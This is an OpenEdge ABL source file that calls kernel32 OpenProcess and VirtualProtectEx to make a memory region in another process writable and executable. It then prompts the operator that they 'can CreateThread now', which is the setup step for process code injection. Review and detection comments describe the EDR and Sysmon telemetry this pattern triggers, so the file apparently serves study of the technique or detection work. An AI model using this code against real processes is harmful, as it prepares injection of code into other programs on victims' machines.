remote.p
// Working variables for the Win32 calls made at the bottom of this file.
// dwProcessId    - id of the process whose memory protection is changed
// hProcess       - handle value returned by OpenProcess
// bSuccess       - return value of the most recent VirtualProtectEx / CloseHandle call
// pRemoteAddress - start address of the region inside the other process
// dwScSz         - size of that region in bytes
// flOldProtect   - receives the previous protection value from VirtualProtectEx
DEFINE VARIABLE dwProcessId AS INTEGER NO-UNDO.
DEFINE VARIABLE hProcess AS INT64 NO-UNDO.
DEFINE VARIABLE bSuccess AS INTEGER NO-UNDO.
DEFINE VARIABLE pRemoteAddress AS INT64 NO-UNDO.
DEFINE VARIABLE dwScSz AS INT64 NO-UNDO.
DEFINE VARIABLE flOldProtect AS INTEGER NO-UNDO.
// External declaration of kernel32!OpenProcess.
// Inputs: requested access mask, inherit-handle flag, target process id.
// Return: the process handle as INT64 (the Win32 API returns NULL/0 on failure).
PROCEDURE OpenProcess EXTERNAL "kernel32.dll":
DEFINE INPUT PARAMETER dwDesiredAccess AS UNSIGNED-LONG.
DEFINE INPUT PARAMETER bInheritHandle AS UNSIGNED-LONG.
DEFINE INPUT PARAMETER dwProcessId AS UNSIGNED-LONG.
DEFINE RETURN PARAMETER hProcess AS INT64.
END.
// External declaration of kernel32!CloseHandle.
// Input: the handle to release. Return: nonzero on success, 0 on failure (Win32 BOOL).
PROCEDURE CloseHandle EXTERNAL "kernel32.dll":
DEFINE INPUT PARAMETER hProcess AS INT64.
DEFINE RETURN PARAMETER bSuccess AS UNSIGNED-LONG.
END.
// External declaration of kernel32!VirtualProtectEx, which changes the page
// protection of a memory region in another process.
// Inputs: process handle, region start address, region size, new protection constant.
// pflOldProtect is passed by reference (HANDLE TO) and receives the previous protection.
// Return: nonzero on success, 0 on failure (Win32 BOOL).
PROCEDURE VirtualProtectEx EXTERNAL "kernel32.dll":
DEFINE INPUT PARAMETER hProcess AS INT64.
DEFINE INPUT PARAMETER lpAddress AS INT64.
DEFINE INPUT PARAMETER dwSize AS INT64.
DEFINE INPUT PARAMETER flNewProtect AS UNSIGNED-LONG.
DEFINE INPUT-OUTPUT PARAMETER pflOldProtect AS HANDLE TO UNSIGNED-LONG.
DEFINE RETURN PARAMETER bSuccess AS UNSIGNED-LONG.
END.
// External declaration of kernel32!GetLastError.
// NOTE(review): declared here but never RUN in this file, so failures of the
// calls below are reported only through their 0/nonzero return values.
PROCEDURE GetLastError EXTERNAL "kernel32.dll":
DEFINE RETURN PARAMETER dwLastError AS UNSIGNED-LONG.
END.
// Main sequence: open another process by id, change the protection of one
// memory region inside it, close the handle, then wait for the operator.
// Size, process id and address are hard-coded and valid only for the single
// process instance they were taken from.
//
// Detection note: a PROCESS_ALL_ACCESS handle to a foreign process followed by
// a cross-process protection change to an executable+writable value is a
// classic code-injection precursor. EDR and Sysmon process-access telemetry
// (event id 10) surface this pattern, and it is unusual for an OpenEdge runtime
// process to produce it.
ASSIGN dwScSz = 9851990.
ASSIGN dwProcessId = 5492.
ASSIGN pRemoteAddress = 1456588816448.
// 2035711 = 0x1F0FFF = PROCESS_ALL_ACCESS (the pre-Vista definition of the mask)
RUN OpenProcess(INPUT 2035711, INPUT 0, INPUT dwProcessId, OUTPUT hProcess).
// NOTE(review): hProcess is only displayed, never tested; a failed open (0)
// is still passed on to VirtualProtectEx and CloseHandle below.
MESSAGE "Handle: " hProcess.
// 64 = 0x40 = PAGE_EXECUTE_READWRITE (PAGE_EXECUTE_READ is 0x20 = 32); the
// region therefore ends up writable as well as executable.
RUN VirtualProtectEx(INPUT hProcess, INPUT pRemoteAddress, INPUT dwScSz, INPUT 64, INPUT-OUTPUT flOldProtect, OUTPUT bSuccess).
MESSAGE "Result of protect: " bSuccess.
// The handle is closed whatever the protect call returned; bSuccess is
// overwritten with the CloseHandle result.
RUN CloseHandle(INPUT hProcess, OUTPUT bSuccess).
MESSAGE "Result of close: " bSuccess.
// Suspends the procedure until the operator acknowledges the message.
PAUSE MESSAGE "Protection changed, you can CreateThread now".